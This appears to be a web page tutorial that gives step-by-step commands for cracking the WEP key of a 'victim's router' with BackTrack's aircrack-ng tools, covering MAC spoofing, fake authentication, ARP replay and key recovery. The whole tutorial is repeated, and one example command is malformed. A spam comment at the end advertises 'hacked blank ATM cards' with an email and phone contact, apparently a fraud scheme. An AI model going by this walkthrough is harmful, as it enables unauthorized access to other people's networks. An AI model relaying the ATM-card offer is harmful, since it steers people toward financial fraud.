([For this tutorial you need external WiFi adapter] OR [have BackTrack installed in your Hard Drive, not a virtual machine])
(Otherwise, look for the method using normal windows OS in the 'In too Deep' section)
Open up BackTrack, Login and then follow the below steps
1. Open konsole and type the following to start up network connections.
»/etc/init.d/networking start
2. Now we are going to put the network card into moniter mode by typing the following.
»airmon-ng
(You will find your Interface here)
3. So first start up the scan
»airmon-ng start wlan0
or
»airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)
4. Lets spoof your MAC address first by typing this next command.
»ifconfig wlan1 down
»macchanger -r wlan1
»ifconfig wlan1 up
This will change the MAC address being used to the computer we are connecting to.
5. Time to start finding our victim's router, type the following in konsole.
»airodump-ng mon0
This will show the entire list of all the WiFi connections your adapter can catch and once you find one that suits your interest, and continue:
6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole: (Read slowly!)
»airodump-ng -c [channel number] --bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)
For Example: »airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w Newcapfile mon0
(*IMPORTANT- You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID, channel number from the previois steps, 'mon0' or 'mon1' based on your adapter, and for name of cap file you can type in any file name like 'MyCapFile')
7. Lets start the passphrapse cracking. We need to get around 30,000-50,000 IVs(packets). We start by sending fake authentication requests. To do this open a new konsole and type:
»aireplay-ng -1 1 -a [The BSSID of the router] mon0
example: »aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
8. Almost done, we just need to contune the capturing process, open another konsole and type:
»aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution protocol, it is needed to find the device address from the IP address)
Collect a good amount of IVs like around 30,000-50,000(the more the better).(Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours). It should be stored in the .cap file Once you've captured enough packets, type CTRL + C to stop the process and continue to step 9.
9. Time to start cracking that cap file :D You can think of it like every single packet contains a bit of leaked password. So we've captured a large number of packets, compiled them in the .cap file and now we're going to try and find out tiny bits of information from each packet and piece it together to give us the PassPhrase. Open a new konsole and type:
»aircrack-ng -b [bssid] [file name]-01.cap
example: »aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
10. Wait a few seconds and we should now be presented with the key to log in to the router.
Key Commands.
►nwlan0 = Interface (Examples: wlan0, ath0, eth0)
►nch = The channel the target is on (Examples: 6, 11 You can find out using your wifi adapter's interface)
►nbssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
►nssid = Name of target (Examples: linksys, default)
►filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
►fragment-*.xor= The * being replaced by a number
►(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
(Otherwise, look for the method using normal windows OS in the 'In too Deep' section)
Open up BackTrack, Login and then follow the below steps
1. Open konsole and type the following to start up network connections.
»/etc/init.d/networking start
2. Now we are going to put the network card into moniter mode by typing the following.
»airmon-ng
(You will find your Interface here)
3. So first start up the scan
»airmon-ng start wlan0
or
»airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)
4. Lets spoof your MAC address first by typing this next command.
»ifconfig wlan1 down
»macchanger -r wlan1
»ifconfig wlan1 up
This will change the MAC address being used to the computer we are connecting to.
5. Time to start finding our victim's router, type the following in konsole.
»airodump-ng mon0
This will show the entire list of all the WiFi connections your adapter can catch and once you find one that suits your interest, and continue:
6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole: (Read slowly!)
»airodump-ng -c [channel number] --bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)
For Example: »airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w Newcapfile mon0
(*IMPORTANT- You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID, channel number from the previois steps, 'mon0' or 'mon1' based on your adapter, and for name of cap file you can type in any file name like 'MyCapFile')
7. Lets start the passphrapse cracking. We need to get around 30,000-50,000 IVs(packets). We start by sending fake authentication requests. To do this open a new konsole and type:
»aireplay-ng -1 1 -a [The BSSID of the router] mon0
example: »aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
8. Almost done, we just need to contune the capturing process, open another konsole and type:
»aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution protocol, it is needed to find the device address from the IP address)
Collect a good amount of IVs like around 30,000-50,000(the more the better).(Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours). It should be stored in the .cap file Once you've captured enough packets, type CTRL + C to stop the process and continue to step 9.
9. Time to start cracking that cap file :D You can think of it like every single packet contains a bit of leaked password. So we've captured a large number of packets, compiled them in the .cap file and now we're going to try and find out tiny bits of information from each packet and piece it together to give us the PassPhrase. Open a new konsole and type:
»aircrack-ng -b [bssid] [file name]-01.cap
example: »aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
10. Wait a few seconds and we should now be presented with the key to log in to the router.
Key Commands.
►nwlan0 = Interface (Examples: wlan0, ath0, eth0)
►nch = The channel the target is on (Examples: 6, 11 You can find out using your wifi adapter's interface)
►nbssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
►nssid = Name of target (Examples: linksys, default)
►filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
►fragment-*.xor= The * being replaced by a number
►(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
I was searching for loan to sort out my bills& debts, then i saw comments about Blank ATM Credit Card that can be hacked to withdraw money from any ATM machines around you . I doubted thus but decided to give it a try by contacting {skylinktechnes@yahoo.com} they responded with their guidelines on how the card works. I was assured that the card can withdraw $5,000 instant per day & was credited with $50,000 so i requested for one & paid the delivery fee to obtain the card, i was shock to see the UPS agent in my resident with a parcel{card} i signed and went back inside and confirmed the card work's after the agent left. This is no doubts because i have the card & has made used of the card. This hackers are USA based hackers set out to help people with financial freedom!! Contact these email if you wants to get rich with this Via email skylinktechnes@yahoo.com whatsapp/t: +1(213)785-1553
ReplyDelete